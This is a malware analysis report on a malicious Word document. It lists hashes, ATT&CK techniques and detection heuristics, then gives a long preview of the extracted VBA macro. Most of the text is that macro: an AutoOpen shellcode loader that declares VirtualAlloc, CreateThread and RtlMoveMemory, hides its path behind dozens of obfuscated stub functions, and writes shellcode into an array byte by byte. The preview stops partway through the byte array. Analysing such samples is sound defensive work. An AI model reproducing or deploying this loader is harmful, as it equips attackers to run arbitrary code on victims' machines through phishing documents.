Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 297af14bf883a393…

MALICIOUS

Office (OLE)

634.5 KB Created: 2018-06-06 23:46:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 43a24c1d630b6aa31f514b29e6a41256 SHA-1: cfb5bd051c2186d149f80f37855c2850133fa5a0 SHA-256: 297af14bf883a393397759c920748fbcac81899192cc4efbfc83cdc111788c17
90 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1083 File and Directory Discovery

The sample is a malicious Office document containing VBA macros. The document body contains a lure instructing the user to enable macros. The VBA script utilizes Windows API functions like VirtualAlloc, CreateThread, and RtlMoveMemory, indicating it likely allocates memory and executes shellcode, a common technique for downloading and executing further payloads. The presence of an AutoOpen macro further supports its malicious intent.

Heuristics 6

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AUTOOPEN()
    Call RAFILJYPQUZVT1CSAUFA
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54711 bytes
SHA-256: b882b621d988636137a1533b697c152cc6a93659c8e5c6b97ca5eed4e0b01a2a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then
PRIVATE DECLARE PTRSAFE FUNCTION ZZETDLACYLRMSXSFNIOA0P58I LIB "KERNEL32" ALIAS "CreateThread" (BYVAL FQI AS LONGPTR, BYVAL GKWL AS LONG, BYVAL U8EQEC AS LONGPTR, BYVAL UBUX AS LONGPTR, BYVAL APZG AS LONG, BYREF OBXO AS LONG)  AS LONGPTR
PRIVATE DECLARE PTRSAFE FUNCTION TKA20QO5VFLGXX LIB "KERNEL32" ALIAS "VirtualAlloc" (BYVAL TWYSI8 AS LONGPTR, BYVAL CA4 AS LONGPTR, BYVAL MQIHNH AS LONG, BYVAL HJRDYD AS LONG)  AS LONGPTR
PRIVATE DECLARE PTRSAFE SUB LA85EYVMJMYYTGWDNP7Q3R LIB "KERNEL32" ALIAS "RtlMoveMemory" (BYREF KAXHP AS ANY, HQBT AS ANY, BYVAL THHJ2 AS LONG)

#Else
Private Declare Function ZZETDLACYLRMSXSFNIOA0P58I Lib "KERNEL32" Alias "CreateThread" (ByVal WRBGMG As Long, ByVal VGX As Long, ByVal MCN0N3 As Long, ByVal EBWR4R As Long, ByVal ER4JJ As Long, ByRef RIFW As Long) As Long
Private Declare Function TKA20QO5VFLGXX Lib "KERNEL32" Alias "VirtualAlloc" (ByVal VKU8S6 As Long, ByVal UMPFP As Long, ByVal V4M As Long, ByVal YUU1HP As Long) As Long
Private Declare Sub LA85EYVMJMYYTGWDNP7Q3R Lib "KERNEL32" Alias "RtlMoveMemory" (ByRef VNG As Any, VJ9T As Any, ByVal GG4WQP As Long)

#End If

Sub AUTOOPEN()
Call RAFILJYPQUZVT1CSAUFA
End Sub
Private Function RAFILJYPQUZVT1CSAUFA() As Date
Call SHXN0HOBVCXHM7
End Function
Function SHXN0HOBVCXHM7() As Long
Call DFJIDGRUCQAJGYDTE3QE1N
End Function
Sub DFJIDGRUCQAJGYDTE3QE1N()
Call QJCPMSXTPFQJW
End Sub
Static Function QJCPMSXTPFQJW() As Boolean
Call EJXNHTCMPU
End Function
Public Function EJXNHTCMPU() As Double
Call C5XKNNDBKRQ
End Function
Public Function C5XKNNDBKRQ() As Object
Call QXHQUJYWZHQR2NQR468HK
End Function
Private Function QXHQUJYWZHQR2NQR468HK() As Long
Call WQK7ZETITJGUMJFXID
End Function
Private Function WQK7ZETITJGUMJFXID() As Date
Call SAO5M1FHHABN
End Function
Function SAO5M1FHHABN() As Currency
Call NFALLNWIAYIFMUNBULJC
End Function
Static Function NFALLNWIAYIFMUNBULJC() As Boolean
Call H0CGBITEGXD
End Function
Static Function H0CGBITEGXD() As Date
Call FSAEMGJGIS6XGIYSRM9LXUP
End Function
Private Function FSAEMGJGIS6XGIYSRM9LXUP() As Boolean
Call KYMQFINDHYOX53W
End Function
Static Function KYMQFINDHYOX53W() As Byte
Call KXXGG7SK2XBHV0TRJK
End Function
Static Function KXXGG7SK2XBHV0TRJK() As Long
Call ILMZ4AOHPBXT5
End Function
Function ILMZ4AOHPBXT5() As Long
Call JXYXZSZAV6EUHATD
End Function
Public Function JXYXZSZAV6EUHATD() As Double
Call OIWTNUDQX8HFCYTRWHGYFCLX
End Function
Static Function OIWTNUDQX8HFCYTRWHGYFCLX() As Currency
Call EFVXTTMTTZW9HO0E25BEZ7
End Function
Function EFVXTTMTTZW9HO0E25BEZ7() As String
Call LX1EHEBTBDT
End Function
Function LX1EHEBTBDT() As Byte
Call CZNDKJMAVYTKXIHAPVNMNQRID
End Function
Sub CZNDKJMAVYTKXIHAPVNMNQRID()
Call ZWEH04YJZKY1ZWNXZT39I9
End Sub
Public Function ZWEH04YJZKY1ZWNXZT39I9() As Object
Call DKO8C84D4J8UTAVUI1X
End Function
Function DKO8C84D4J8UTAVUI1X() As Integer
Call ZHRCJ0SCXFVOFMITYGSZSXD4K
End Function
Public Function ZHRCJ0SCXFVOFMITYGSZSXD4K() As Single
Call ENSUE3DHV7Q4F6NPNWNET2
End Function
Static Function ENSUE3DHV7Q4F6NPNWNET2() As Byte
Call WEYQOYLNB1C
End Function
Function WEYQOYLNB1C() As Object
Call V7JHHAJX68BWTICIQTHS22
End Function
Sub V7JHHAJX68BWTICIQTHS22()
Call BNAE60MKUX3Q5URB6
End Sub
Static Function BNAE60MKUX3Q5URB6() As String
Call TEYAZSFJ1Z
End Function
Public Function TEYAZSFJ1Z() As Currency
Call IKNBSAZGZGK
End Function
Sub IKNBSAZGZGK()
Call GVHJ6AYZCMN28
End Sub
Function GVHJ6AYZCMN28() As Integer
Call XPEWL3BZBIHRLUBBGBL
End Function
Private Function XPEWL3BZBIHRLUBBGBL() As Single
Call LT4XSTLOJTGT
End Function
Private Function LT4XSTLOJTGT() As Variant
Call ALMTLFWEBGU1A0HBPQBVZWA
End Function
Static Function ALMTLFWEBGU1A0HBPQBVZWA() As Single
Call DVHAT27QEU
End Function
Static Function DVHAT27QEU() As Double
Call FQA05VNJV3K
End Function
Private Function FQA05VNJV3K() As Single
Call FOW0OF8VRKQUZQQLHY5DS1WU2
End Function
Private Function FOW0OF8VRKQUZQQLHY5DS1WU2() As Byte
Call DD66W6WNZYIIJI1UDDN
End Function
Private Function DD66W6WNZYIIJI1UDDN() As Long
Call DNYKBGCYFZWKM8JBPNGR5OT
End Function
Private Function DNYKBGCYFZWKM8JBPNGR5OT() As Integer
Call GP3FHM7QAC5EBVKSLX
End Function
Private Function GP3FHM7QAC5EBVKSLX() As Object
Call BSYTZZMK7JV
End Function
Function BSYTZZMK7JV() As Date
Call HWADUEMWAJ0
End Function
Private Function HWADUEMWAJ0() As Byte
Call JMM3GSSXWFJLFF5BN6X
End Function
Public Function JMM3GSSXWFJLFF5BN6X() As Long
Call PTJZMLTH2B
End Function
Sub PTJZMLTH2B()
Call ZTNKG0TGZHSNX29VCLJQ55B
End Sub
Static Function ZTNKG0TGZHSNX29VCLJQ55B() As Single
Call M0MEMYQD3XM5UQQ4
End Function
Static Function M0MEMYQD3XM5UQQ4() As Boolean
Call N5JCCZEVIFJMRPRI3KQARPDVU
End Function

Sub JMQUX(ByVal R3EGED As Date, ByVal DGLCIG As Single, ByRef HYITB0 As Variant, ByVal FYEZP As Long, ByVal CMRZ As Single, ByVal CEBV As Long)
HYITB0(FYEZP + 0) = 233
HYITB0(1) = 141
HYITB0(FYEZP + 2) = 1
HYITB0(FYEZP + 3) = 0
HYITB0(FYEZP + 4) = 0
HYITB0(FYEZP + 5) = 225
HYITB0(FYEZP + 6) = 245
HYITB0(FYEZP + 7) = 8
HYITB0(FYEZP + 8) = 170
HYITB0(9) = 144
HYITB0(FYEZP + 10) = 201
HYITB0(FYEZP + 11) = 197
HYITB0(12) = 234
HYITB0(FYEZP + 13) = 140
HYITB0(FYEZP + 14) = 221

End Sub
Function AJEA(ByRef RMHX4L As Boolean, ByVal KTV As Long, ByVal UKW As Long, ByRef ET74 As Variant, ByVal ZJBQ As Date) As String
ET74(15) = 165
ET74(UKW + 1) = 241
ET74(UKW + 2) = 54
ET74(18) = 110
ET74(UKW + 4) = 56
ET74(UKW + 5) = 134
ET74(21) = 30
ET74(UKW + 7) = 94
ET74(23) = 97
ET74(24) = 176
ET74(25) = 74
ET74(UKW + 11) = 112
ET74(UKW + 12) = 152
ET74(28) = 1
ET74(UKW + 14) = 113
ET74(UKW + 15) = 139
ET74(UKW + 16) = 39
ET74(32) = 200
ET74(33) = 67
ET74(UKW + 19) = 251
ET74(UKW + 20) = 111
ET74(UKW + 21) = 93
ET74(37) = 160
ET74(38) = 179
ET74(UKW + 24) = 33
ET74(UKW + 25) = 91
ET74(41) = 220
ET74(42) = 132
ET74(43) = 133
ET74(UKW + 29) = 224
ET74(UKW + 30) = 1
ET74(46) = 106
ET74(UKW + 32) = 182
ET74(48) = 203
ET74(49) = 15
ET74(50) = 190
ET74(UKW + 36) = 228
ET74(UKW + 37) = 7
ET74(UKW + 38) = 51
ET74(UKW + 39) = 129
ET74(55) = 147
ET74(56) = 186
ET74(57) = 20
ET74(UKW + 43) = 153
ET74(59) = 217
ET74(UKW + 45) = 150
ET74(61) = 14
ET74(62) = 11
ET74(63) = 162
ET74(UKW + 49) = 11
ET74(UKW + 50) = 105
ET74(66) = 70
ET74(UKW + 52) = 237
ET74(UKW + 53) = 142
ET74(69) = 171
ET74(UKW + 55) = 89
ET74(UKW + 56) = 12
ET74(72) = 222
ET74(UKW + 58) = 198
ET74(UKW + 59) = 58
ET74(UKW + 60) = 233
ET74(76) = 52
ET74(77) = 100
ET74(78) = 255
ET74(UKW + 64) = 61
ET74(UKW + 65) = 149
ET74(UKW + 66) = 36
ET74(82) = 38
ET74(83) = 215
ET74(UKW + 69) = 8
ET74(85) = 213
ET74(UKW + 71) = 205
ET74(UKW + 72) = 219
ET74(88) = 213
ET74(UKW + 74) = 189
ET74(90) = 250
ET74(UKW + 76) = 1
ET74(UKW + 77) = 204
ET74(UKW + 78) = 214
ET74(UKW + 79) = 214
ET74(UKW + 80) = 212

End Function
Static Function FXUCGZ(ByRef OB92 As Variant, ByVal LH5G50 As Single, ByVal YYUE As Integer, ByVal PKO0YQ As Single, ByVal AWWKS As Long, ByVal CIKFRJ As Long) As Boolean
OB92(AWWKS + 0) = 126
OB92(AWWKS + 1) = 12
OB92(98) = 235
OB92(99) = 242
OB92(100) = 129
OB92(101) = 130
OB92(AWWKS + 6) = 107
OB92(103) = 78
OB92(104) = 176
OB92(105) = 204
OB92(AWWKS + 10) = 105
OB92(AWWKS + 11) = 115
OB92(AWWKS + 12) = 106
OB92(109) = 51
OB92(AWWKS + 14) = 29
OB92(AWWKS + 15) = 183
OB92(112) = 210
OB92(113) = 245
OB92(AWWKS + 18) = 38
OB92(AWWKS + 19) = 141
OB92(AWWKS + 20) = 10
OB92(AWWKS + 21) = 130
OB92(AWWKS + 22) = 195
OB92(AWWKS + 23) = 183
OB92(120) = 129
OB92(AWWKS + 25) = 193
OB92(122) = 21
OB92(AWWKS + 27) = 141
OB92(AWWKS + 28) = 34
OB92(125) = 75
OB92(AWWKS + 30) = 104
OB92(127) = 56
OB92(128) = 162
OB92(129) = 172
OB92(AWWKS + 34) = 105
OB92(AWWKS + 35) = 250
OB92(132) = 180
OB92(133) = 167
OB92(134) = 99
OB92(AWWKS + 39) = 101
OB92(136) = 85
OB92(AWWKS + 41) = 111
OB92(AWWKS + 42) = 145
OB92(139) = 161

End Function
Sub F4N4(ByVal GEO As Date, ByVal N6VH As Long, ByRef MYC As Integer, ByRef HZL As Variant, ByVal Q3XE As Long, ByRef MBBY As Variant)
HZL(N6VH + 0) = 2
HZL(N6VH + 1) = 238
HZL(142) = 69
HZL(143) = 168
HZL(N6VH + 4) = 254
HZL(145) = 3
HZL(146) = 64
HZL(147) = 137
HZL(148) = 143
HZL(149) = 190
HZL(N6VH + 10) = 223
HZL(N6VH + 11) = 168
HZL(N6VH + 12) = 62
HZL(153) = 163
HZL(154) = 105
HZL(155) = 253
HZL(N6VH + 16) = 27
HZL(157) = 237
HZL(158) = 68
HZL(159) = 84
HZL(N6VH + 20) = 246
HZL(161) = 201
HZL(162) = 62
HZL(163) = 136
HZL(164) = 169
HZL(165) = 152
HZL(166) = 199
HZL(N6VH + 27) = 210
HZL(168) = 75
HZL(169) = 47
HZL(N6VH + 30) = 49
HZL(N6VH + 31) = 244
HZL(172) = 123
HZL(N6VH + 33) = 23
HZL(N6VH + 34) = 247
HZL(175) = 140
HZL(176) = 155
HZL(177) = 207
HZL(N6VH + 38) = 242
HZL(179) = 73
HZL(180) = 18
HZL(N6VH + 41) = 6
HZL(N6VH + 42) = 167
HZL(183) = 46
HZL(184) = 139
HZL(185) = 226
HZL(186) = 119
HZL(187) = 212
HZL(N6VH + 48) = 52
HZL(189) = 61
HZL(N6VH + 50) = 234
HZL(191) = 163
HZL(N6VH + 52) = 252
HZL(N6VH + 53) = 228
HZL(N6VH + 54) = 238
HZL(N6VH + 55) = 28
HZL(196) = 221
HZL(197) = 216
HZL(198) = 17
HZL(N6VH + 59) = 18
HZL(200) = 17

End Sub
Public Function NCHW1(ByVal VT8J As Integer, ByRef XEB As Variant, ByRef BEH As Double, ByVal RGQ As Long, ByVal VQH2K As Long, ByRef KBDUGM As Single, ByVal XXSRD As Long) As Date
XEB(201) = 141
XEB(202) = 202
XEB(XXSRD + 2) = 236
XEB(XXSRD + 3) = 83
XEB(XXSRD + 4) = 46
XEB(XXSRD + 5) = 177
XEB(207) = 231
XEB(XXSRD + 7) = 41
XEB(XXSRD + 8) = 216
XEB(XXSRD + 9) = 190
XEB(XXSRD + 10) = 80
XEB(XXSRD + 11) = 24
XEB(XXSRD + 12) = 219
XEB(214) = 150
XEB(215) = 203
XEB(216) = 235
XEB(217) = 254
XEB(218) = 189
XEB(XXSRD + 18) = 143
XEB(220) = 237
XEB(XXSRD + 20) = 186
XEB(222) = 216
XEB(223) = 167
XEB(XXSRD + 23) = 51
XEB(225) = 122
XEB(226) = 247
XEB(227) = 52
XEB(XXSRD + 27) = 212
XEB(229) = 226
XEB(230) = 198
XEB(XXSRD + 30) = 167
XEB(232) = 39

End Function
Sub IKAK(ByRef EOF As Currency, ByVal FOAB As Long, ByRef CBPTL2 As Variant, ByVal AFG4VC As Boolean, ByVal IJBL As Long)
CBPTL2(233) = 7
CBPTL2(234) = 222
CBPTL2(235) = 9
CBPTL2(IJBL + 3) = 14
CBPTL2(237) = 177
CBPTL2(238) = 242
CBPTL2(IJBL + 6) = 54
CBPTL2(240) = 41
CBPTL2(241) = 157
CBPTL2(242) = 35
CBPTL2(IJBL + 10) = 26
CBPTL2(244) = 31
CBPTL2(245) = 189
CBPTL2(246) = 47
CBPTL2(247) = 250
CBPTL2(248) = 218
CBPTL2(249) = 120
CBPTL2(250) = 188
CBPTL2(IJBL + 18) = 174
CBPTL2(252) = 200
CBPTL2(253) = 228
CBPTL2(254) = 144
CBPTL2(IJBL + 22) = 225
CBPTL2(256) = 27
CBPTL2(257) = 14
CBPTL2(258) = 216
CBPTL2(259) = 81
CBPTL2(IJBL + 27) = 10
CBPTL2(IJBL + 28) = 59
CBPTL2(262) = 100
CBPTL2(263) = 19
CBPTL2(264) = 17
CBPTL2(IJBL + 32) = 30
CBPTL2(266) = 233
CBPTL2(267) = 204
CBPTL2(IJBL + 35) = 42
CBPTL2(269) = 33
CBPTL2(270) = 63
CBPTL2(IJBL + 38) = 249
CBPTL2(272) = 25
CBPTL2(273) = 160
CBPTL2(274) = 162
CBPTL2(275) = 42
CBPTL2(276) = 167
CBPTL2(IJBL + 44) = 44
CBPTL2(IJBL + 45) = 241
CBPTL2(IJBL + 46) = 63
CBPTL2(280) = 218
CBPTL2(IJBL + 48) = 205
CBPTL2(IJBL + 49) = 244
CBPTL2(IJBL + 50) = 180
CBPTL2(284) = 67
CBPTL2(IJBL + 52) = 58
CBPTL2(286) = 144
CBPTL2(IJBL + 54) = 208
CBPTL2(IJBL + 55) = 52
CBPTL2(289) = 31
CBPTL2(IJBL + 57) = 17
CBPTL2(291) = 243
CBPTL2(292) = 3
CBPTL2(IJBL + 60) = 97
CBPTL2(294) = 106
CBPTL2(295) = 210
CBPTL2(IJBL + 63) = 73
CBPTL2(IJBL + 64) = 83
CBPTL2(IJBL + 65) = 110
CBPTL2(IJBL + 66) = 180
CBPTL2(IJBL + 67) = 38
CBPTL2(301) = 253
CBPTL2(IJBL + 69) = 19
CBPTL2(IJBL + 70) = 179
CBPTL2(IJBL + 71) = 123
CBPTL2(305) = 96
CBPTL2(IJBL + 73) = 184
CBPTL2(IJBL + 74) = 254
CBPTL2(308) = 48
CBPTL2(IJBL + 76) = 169
CBPTL2(310) = 92
CBPTL2(311) = 27
CBPTL2(IJBL + 79) = 108
CBPTL2(IJBL + 80) = 127
CBPTL2(IJBL + 81) = 228
CBPTL2(315) = 29
CBPTL2(316) = 224
CBPTL2(IJBL + 84) = 62
CBPTL2(IJBL + 85) = 88
CBPTL2(319) = 243
CBPTL2(IJBL + 87) = 254
CBPTL2(321) = 46
CBPTL2(IJBL + 89) = 36
CBPTL2(IJBL + 90) = 155
CBPTL2(324) = 60
CBPTL2(325) = 212
CBPTL2(IJBL + 93) = 89
CBPTL2(IJBL + 94) = 103

End Sub
Private Function RZCS(ByVal WID6 As Long, ByVal HUR As Long, ByRef B51 As Variant) As Byte
B51(WID6 + 0) = 84
B51(329) = 36
B51(330) = 235
B51(WID6 + 3) = 64
B51(WID6 + 4) = 132
B51(WID6 + 5) = 199
B51(WID6 + 6) = 240
B51(335) = 225
B51(WID6 + 8) = 205
B51(337) = 92
B51(338) = 233
B51(339) = 24
B51(340) = 57
B51(WID6 + 13) = 179

End Function
Public Function ALXNZS(ByVal J4MZEI As Long, ByRef X0C As Variant, ByVal DMQ As String, ByVal VVZWJC As Long) As Boolean
X0C(J4MZEI + 0) = 241
X0C(J4MZEI + 1) = 10
X0C(344) = 15
X0C(345) = 15
X0C(J4MZEI + 4) = 15
X0C(347) = 109
X0C(J4MZEI + 6) = 30
X0C(349) = 110
X0C(350) = 108
X0C(351) = 203
X0C(J4MZEI + 10) = 249
X0C(353) = 185
X0C(J4MZEI + 12) = 145
X0C(J4MZEI + 13) = 199
X0C(J4MZEI + 14) = 54
X0C(J4MZEI + 15) = 20
X0C(358) = 178
X0C(359) = 81
X0C(J4MZEI + 18) = 175
X0C(J4MZEI + 19) = 18
X0C(362) = 226
X0C(J4MZEI + 21) = 242
X0C(364) = 193
X0C(365) = 254
X0C(366) = 87
X0C(J4MZEI + 25) = 3
X0C(J4MZEI + 26) = 146
X0C(369) = 22
X0C(J4MZEI + 28) = 176
X0C(J4MZEI + 29) = 247
X0C(J4MZEI + 30) = 68
X0C(373) = 200
X0C(J4MZEI + 32) = 45
X0C(375) = 141
X0C(376) = 67
X0C(J4MZEI + 35) = 253
X0C(J4MZEI + 36) = 242
X0C(J4MZEI + 37) = 33
X0C(380) = 125
X0C(381) = 75
X0C(382) = 71
X0C(J4MZEI + 41) = 217
X0C(J4MZEI + 42) = 166
X0C(385) = 65
X0C(J4MZEI + 44) = 214

End Function
Static Function LS8LPM(ByRef OCRXB As Variant, ByVal GKMUJL As Long, ByVal U1EZ As Object, ByVal CJNOU5 As Long, ByRef EN3J As Object) As Date
OCRXB(CJNOU5 + 0) = 247
OCRXB(388) = 114
OCRXB(389) = 161
OCRXB(CJNOU5 + 3) = 244
OCRXB(391) = 15
OCRXB(392) = 219
OCRXB(CJNOU5 + 6) = 157
OCRXB(CJNOU5 + 7) = 208
OCRXB(CJNOU5 + 8) = 72
OCRXB(396) = 98
OCRXB(397) = 34
OCRXB(398) = 199
OCRXB(CJNOU5 + 12) = 156
OCRXB(CJNOU5 + 13) = 69
OCRXB(CJNOU5 + 14) = 12
OCRXB(CJNOU5 + 15) = 86
OCRXB(403) = 235
OCRXB(404) = 2
OCRXB(CJNOU5 + 18) = 159
OCRXB(CJNOU5 + 19) = 70
OCRXB(CJNOU5 + 20) = 235
OCRXB(408) = 7
OCRXB(409) = 24
OCRXB(CJNOU5 + 23) = 208
OCRXB(CJNOU5 + 24) = 9
OCRXB(412) = 49
OCRXB(CJNOU5 + 26) = 236
OCRXB(CJNOU5 + 27) = 73
OCRXB(415) = 249
OCRXB(CJNOU5 + 29) = 233
OCRXB(CJNOU5 + 30) = 113
OCRXB(CJNOU5 + 31) = 2
OCRXB(419) = 0
OCRXB(420) = 0
OCRXB(421) = 235
OCRXB(CJNOU5 + 35) = 101
OCRXB(CJNOU5 + 36) = 49
OCRXB(CJNOU5 + 37) = 14
OCRXB(425) = 131
OCRXB(426) = 198
OCRXB(CJNOU5 + 40) = 4
OCRXB(428) = 57
OCRXB(CJNOU5 + 42) = 198
OCRXB(CJNOU5 + 43) = 144
OCRXB(CJNOU5 + 44) = 235
OCRXB(432) = 34
OCRXB(433) = 235
OCRXB(434) = 50
OCRXB(CJNOU5 + 48) = 235
OCRXB(436) = 5
OCRXB(CJNOU5 + 50) = 233
OCRXB(CJNOU5 + 51) = 158
OCRXB(CJNOU5 + 52) = 1
OCRXB(CJNOU5 + 53) = 0
OCRXB(441) = 0
OCRXB(442) = 233
OCRXB(CJNOU5 + 56) = 148
OCRXB(CJNOU5 + 57) = 2
OCRXB(CJNOU5 + 58) = 0
OCRXB(CJNOU5 + 59) = 0
OCRXB(447) = 235
OCRXB(448) = 8
OCRXB(CJNOU5 + 62) = 40
OCRXB(450) = 248
OCRXB(451) = 30
OCRXB(CJNOU5 + 65) = 59
OCRXB(CJNOU5 + 66) = 173
OCRXB(454) = 173
OCRXB(455) = 165
OCRXB(456) = 221
OCRXB(CJNOU5 + 70) = 233
OCRXB(458) = 166
OCRXB(CJNOU5 + 72) = 1
OCRXB(460) = 0
OCRXB(461) = 0
OCRXB(462) = 233
OCRXB(CJNOU5 + 76) = 210
OCRXB(464) = 2
OCRXB(465) = 0
OCRXB(466) = 0
OCRXB(CJNOU5 + 80) = 114
OCRXB(CJNOU5 + 81) = 125
OCRXB(CJNOU5 + 82) = 235
OCRXB(CJNOU5 + 83) = 2

End Function
Sub HWIEP(ByVal BLDKO As String, ByRef QIWPYX As Single, ByVal QOB4P As Long, ByRef KD0KPO As Variant, ByVal M0Z As Boolean, ByVal Q43YRG As Byte, ByVal OJ502 As Long)
KD0KPO(471) = 0
KD0KPO(QOB4P + 1) = 249
KD0KPO(473) = 235
KD0KPO(QOB4P + 3) = 38
KD0KPO(QOB4P + 4) = 233
KD0KPO(476) = 22
KD0KPO(477) = 1
KD0KPO(478) = 0
KD0KPO(QOB4P + 8) = 0
KD0KPO(QOB4P + 9) = 233
KD0KPO(QOB4P + 10) = 164
KD0KPO(QOB4P + 11) = 1
KD0KPO(483) = 0
KD0KPO(QOB4P + 13) = 0
KD0KPO(485) = 235
KD0KPO(486) = 51
KD0KPO(QOB4P + 16) = 235
KD0KPO(QOB4P + 17) = 42
KD0KPO(QOB4P + 18) = 233
KD0KPO(QOB4P + 19) = 137
KD0KPO(491) = 0
KD0KPO(492) = 0
KD0KPO(QOB4P + 22) = 0
KD0KPO(QOB4P + 23) = 86
KD0KPO(495) = 94
KD0KPO(496) = 233
KD0KPO(497) = 176
KD0KPO(498) = 2
KD0KPO(499) = 0
KD0KPO(QOB4P + 29) = 0
KD0KPO(QOB4P + 30) = 233
KD0KPO(502) = 187
KD0KPO(503) = 0
KD0KPO(504) = 0
KD0KPO(505) = 0
KD0KPO(506) = 233
KD0KPO(507) = 211
KD0KPO(508) = 1
KD0KPO(509) = 0
KD0KPO(510) = 0
KD0KPO(QOB4P + 40) = 235
KD0KPO(512) = 52
KD0KPO(513) = 141
KD0KPO(514) = 136
KD0KPO(QOB4P + 44) = 135
KD0KPO(QOB4P + 45) = 252
KD0KPO(QOB4P + 46) = 255
KD0KPO(518) = 255
KD0KPO(QOB4P + 48) = 233
KD0KPO(520) = 110
KD0KPO(QOB4P + 50) = 2
KD0KPO(QOB4P + 51) = 0
KD0KPO(523) = 0
KD0KPO(524) = 235
KD0KPO(525) = 17
KD0KPO(QOB4P + 55) = 235
KD0KPO(QOB4P + 56) = 151

End Sub
Sub JLEOHE(ByRef Z9V1 As Variant, ByVal UMDGU As Long, ByVal YSVUCH As Long)
Z9V1(UMDGU + 0) = 89
Z9V1(UMDGU + 1) = 235
Z9V1(UMDGU + 2) = 146
Z9V1(UMDGU + 3) = 233
Z9V1(UMDGU + 4) = 128
Z9V1(533) = 2
Z9V1(534) = 0
Z9V1(535) = 0
Z9V1(UMDGU + 8) = 235
Z9V1(UMDGU + 9) = 44
Z9V1(538) = 233
Z9V1(539) = 33
Z9V1(540) = 1
Z9V1(UMDGU + 13) = 0
Z9V1(542) = 0
Z9V1(543) = 233
Z9V1(544) = 235
Z9V1(UMDGU + 17) = 0
Z9V1(546) = 0
Z9V1(547) = 0
Z9V1(548) = 233
Z9V1(UMDGU + 21) = 94
Z9V1(550) = 1
Z9V1(UMDGU + 23) = 0
Z9V1(552) = 0
Z9V1(553) = 232
Z9V1(554) = 42
Z9V1(UMDGU + 27) = 2
Z9V1(556) = 0
Z9V1(557) = 0
Z9V1(558) = 233
Z9V1(UMDGU + 31) = 195
Z9V1(560) = 0
Z9V1(UMDGU + 33) = 0
Z9V1(562) = 0
Z9V1(563) = 86
Z9V1(UMDGU + 36) = 94
Z9V1(565) = 233
Z9V1(UMDGU + 38) = 171
Z9V1(567) = 0
Z9V1(568) = 0
Z9V1(569) = 0
Z9V1(570) = 81
Z9V1(571) = 89
Z9V1(UMDGU + 44) = 233
Z9V1(573) = 230
Z9V1(574) = 1
Z9V1(UMDGU + 47) = 0
Z9V1(576) = 0
Z9V1(UMDGU + 49) = 233
Z9V1(UMDGU + 50) = 98
Z9V1(579) = 1
Z9V1(580) = 0
Z9V1(581) = 0
Z9V1(582) = 233
Z9V1(583) = 90
Z9V1(584) = 2
Z9V1(UMDGU + 57) = 0
Z9V1(586) = 0
Z9V1(587) = 233
Z9V1(588) = 149
Z9V1(589) = 0
Z9V1(590) = 0
Z9V1(UMDGU + 63) = 0
Z9V1(UMDGU + 64) = 235
Z9V1(UMDGU + 65) = 142
Z9V1(UMDGU + 66) = 105
Z9V1(595) = 201
Z9V1(UMDGU + 68) = 57
Z9V1(597) = 17
Z9V1(598) = 24
Z9V1(599) = 68
Z9V1(UMDGU + 72) = 233
Z9V1(UMDGU + 73) = 243
Z9V1(602) = 0
Z9V1(603) = 0
Z9V1(UMDGU + 76) = 0
Z9V1(UMDGU + 77) = 233
Z9V1(606) = 205
Z9V1(UMDGU + 79) = 0
Z9V1(608) = 0
Z9V1(UMDGU + 81) = 0
Z9V1(UMDGU + 82) = 83
Z9V1(611) = 91
Z9V1(612) = 233
Z9V1(UMDGU + 85) = 173
Z9V1(614) = 1
Z9V1(615) = 0
Z9V1(616) = 0
Z9V1(UMDGU + 89) = 235
Z9V1(618) = 7
Z9V1(UMDGU + 91) = 139
Z9V1(620) = 30
Z9V1(UMDGU + 93) = 254
Z9V1(UMDGU + 94) = 146
Z9V1(623) = 87
Z9V1(624) = 229
Z9V1(UMDGU + 97) = 168
Z9V1(626) = 233
Z9V1(627) = 158
Z9V1(628) = 0
Z9V1(UMDGU + 101) = 0
Z9V1(UMDGU + 102) = 0
Z9V1(UMDGU + 103) = 233
Z9V1(632) = 154
Z9V1(UMDGU + 105) = 1

End Sub
Private Function OTVR(ByRef RQC5 As Variant, ByVal FB7 As Long, ByVal RFK As Long, ByVal ZV2MG As Date, ByRef SKQI As Boolean) As Currency
RQC5(634) = 0
RQC5(FB7 + 1) = 0
RQC5(FB7 + 2) = 156
RQC5(637) = 83
RQC5(638) = 82
RQC5(FB7 + 5) = 87
RQC5(640) = 129
RQC5(FB7 + 7) = 199
RQC5(642) = 20
RQC5(643) = 106
RQC5(644) = 0
RQC5(FB7 + 11) = 0
RQC5(646) = 129
RQC5(647) = 234
RQC5(648) = 211
RQC5(FB7 + 15) = 40
RQC5(650) = 0
RQC5(651) = 0
RQC5(652) = 95
RQC5(653) = 90
RQC5(FB7 + 20) = 91
RQC5(655) = 156
RQC5(FB7 + 22) = 80
RQC5(657) = 81
RQC5(658) = 141
RQC5(659) = 136
RQC5(660) = 230
RQC5(FB7 + 27) = 100
RQC5(662) = 0
RQC5(FB7 + 29) = 0
RQC5(664) = 129
RQC5(665) = 193
RQC5(FB7 + 32) = 157
RQC5(667) = 49
